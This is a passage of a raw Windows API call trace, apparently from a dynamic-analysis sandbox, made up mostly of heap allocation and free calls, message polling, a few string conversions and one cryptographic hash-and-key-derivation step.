HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.628] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0206.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0206.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0206.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0206.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0206.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0206.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x24b1c28 [0206.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0206.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0206.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0206.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0206.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x24b1738, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0206.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0206.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0206.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0206.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0206.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0206.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0206.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0206.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.631] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0206.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0206.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0206.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0206.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0206.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0206.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0206.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0206.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0206.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0206.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0206.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0206.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0206.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x24b1838 [0206.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0206.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0206.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0206.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0206.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0206.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0206.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0206.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0206.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0206.633] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0206.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0206.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0206.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0206.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0206.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0206.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0206.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0206.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0206.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0206.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0206.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x24b1738, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0206.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0206.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0206.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0206.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0206.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.635] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.635] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.635] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.635] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.635] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.635] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.635] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.635] CryptHashData (hHash=0xaa5760, pbData=0x24b1838, dwDataLen=0x3, dwFlags=0x1) returned 1 [0206.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0206.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0206.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0206.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0206.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0206.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0206.636] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0206.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0206.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0206.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0206.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0206.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0206.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0206.636] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.636] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0206.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0206.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0206.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0206.636] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.636] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0206.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0206.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0206.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0206.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0206.637] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.637] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.637] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0206.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0206.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0206.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0206.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0206.637] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0206.637] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0206.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0206.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0206.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0206.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0206.638] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0206.638] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.638] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0206.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0206.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0206.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0206.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0206.638] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0206.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0206.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0206.639] CryptDeriveKey (in: hProv=0xad2940, Algid=0x6601, hBaseData=0xaa5760, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5860) returned 1 [0206.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0206.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0206.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0206.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0206.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0206.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0206.639] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0206.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0206.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0206.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.640] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.640] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0206.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.640] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0206.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0206.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.640] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.640] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) 